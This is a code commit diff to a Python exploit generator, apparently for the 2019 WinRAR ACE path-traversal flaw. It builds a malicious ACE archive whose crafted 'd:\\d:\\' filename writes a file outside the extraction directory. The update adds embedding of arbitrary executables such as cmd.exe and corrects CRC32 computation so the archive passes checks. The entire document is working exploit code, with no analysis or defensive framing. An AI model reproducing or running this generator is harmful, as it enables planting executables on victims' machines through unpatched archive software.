update WinRAR exploit

Author: fupinglee

exploit/WinRAR_exploit/WinRAR_exploit.py

@@ -11,6 +11,8 @@
 使用方法:python WinRAR_exploit.py 
 
 Python version 3.7.1
+
+可以自定义添加文件，文件可为exe等格式，如果文件不存在，则以文本加入压缩文件中
 """
 
 import sys
@@ -86,70 +88,79 @@ def ace_crc16(buf):
     50905
     """
     return AceCRC16(buf).sum
-
-def generate_exploit_ace(filename,content,outfilename):
-	payload = '9f7c31000000902a2a4143452a2a141402008650554e010754e200000000162a554e524547495354455245442056455253494f4e2a'
-
-	content_hex = binascii.b2a_hex(content.encode("gbk"))
-
-	filename_hex = binascii.b2a_hex(filename.encode("gbk"))
-	filenamelength_hex = getlenHex(len(filename),4)
-
-	reserved1_hex='5445'
-
-	params_hex='0a00'
-	compqual_hex='03'		#normal
-	comptype_hex='00'		#stored
-	crc32_hex='0fe59a57'      # 0x579ae50f
-	attribs_hex='20000000'  #ARCHIVE
-	datetime_hex='3850554e'  #2019-02-21 10:01:48
-
-	packsize = origsize = len(content)
-	packsize_hex = origsize_hex = getlenHex(packsize,8)
-	hdr_flags_hex = '0180'
-	hdr_type_hex = '01'
-
-	str1 = 	hdr_type_hex+\
-			hdr_flags_hex+\
-			packsize_hex+\
-			origsize_hex+\
-			datetime_hex+\
-			attribs_hex+\
-			crc32_hex+\
-			comptype_hex+\
-			compqual_hex+\
-			params_hex+\
-			reserved1_hex+\
-			filenamelength_hex+\
-			filename_hex.decode()
-
-	str1lenHex = getlenHex(round(len(str1)/2),4)#获取长度的hex
-	
-	str2hex = str1lenHex+str1
-
-	hdr_crc_hex = getlenHex(ace_crc16(bytes.fromhex(str1)),4)
-
-	payload += hdr_crc_hex
-	payload += str2hex
-	payload += content_hex.decode()
-	
-	with open(outfilename,'wb') as file:
-		file.write(bytes.fromhex(payload))
-
-	print("Generated "+outfilename+" successfully")
+def ace_crc32(buf):
+    return AceCRC32(buf).sum
+
+def generate_exploit_ace(filename,buf,outfilename):
+    payload = '9f7c31000000902a2a4143452a2a141402008650554e010754e200000000162a554e524547495354455245442056455253494f4e2a'
+
+    content_hex = binascii.b2a_hex(buf)
+
+    filename_hex = binascii.b2a_hex(filename.encode("gbk"))
+    filenamelength_hex = getlenHex(len(filename),4)
+
+    reserved1_hex='5445'
+
+    params_hex='0a00'
+    compqual_hex='03'       #normal
+    comptype_hex='00'       #stored
+    crc32 = ace_crc32(buf)
+    crc32_hex= getlenHex(crc32,8)
+
+    attribs_hex='20000000'  #ARCHIVE
+    datetime_hex='3850554e'  #2019-02-21 10:01:48
+
+    packsize = origsize = len(buf)
+    packsize_hex = origsize_hex = getlenHex(packsize,8)
+    hdr_flags_hex = '0180'
+    hdr_type_hex = '01'
+
+    str1 =  hdr_type_hex+\
+            hdr_flags_hex+\
+            packsize_hex+\
+            origsize_hex+\
+            datetime_hex+\
+            attribs_hex+\
+            crc32_hex+\
+            comptype_hex+\
+            compqual_hex+\
+            params_hex+\
+            reserved1_hex+\
+            filenamelength_hex+\
+            filename_hex.decode()
+
+    str1lenHex = getlenHex(round(len(str1)/2),4)#获取长度的hex
+    
+    str2hex = str1lenHex+str1
+
+    hdr_crc_hex = getlenHex(ace_crc16(bytes.fromhex(str1)),4)
+
+    payload += hdr_crc_hex
+    payload += str2hex
+    payload += content_hex.decode()
+    
+    with open(outfilename,'wb') as file:
+        file.write(bytes.fromhex(payload))
+
+    print("Generated "+outfilename+" successfully")
 
 def getlenHex(x,y):#x为整数，y为所需长度
-	x_hex = format(x,'x').rjust(y,'0')
-	outhex = ''
-	for a in range(len(x_hex),0,-2):
-		outhex+=(x_hex[a-2:a])
-	return outhex
+    x_hex = format(x,'x').rjust(y,'0')
+    outhex = ''
+    for a in range(len(x_hex),0,-2):
+        outhex+=(x_hex[a-2:a])
+    return outhex
 
 
 if __name__ == '__main__':
 
-	outfilename = 'WinRAR_exploit.ace' #生成的文件名
-	filename = 'd:\\d:\\aaa.txt' #解压的路径
-	content = "Hello lab!" #文件内容
-	generate_exploit_ace(filename,content,outfilename)
-
+    outfilename = 'WinRAR_exploit_wg.rar' #生成的文件名
+    filename = 'cmd.exe' #添加的文件
+    filepath = 'd:\\d:\\%s' % (filename) #解压的路径
+    buf = b'Hello world!'
+    try:
+        with open(filename,'rb') as f:
+            buf = f.read()
+    except Exception as e:
+        filepath = 'd:\\d:\\test.txt'  
+    generate_exploit_ace(filepath,buf,outfilename)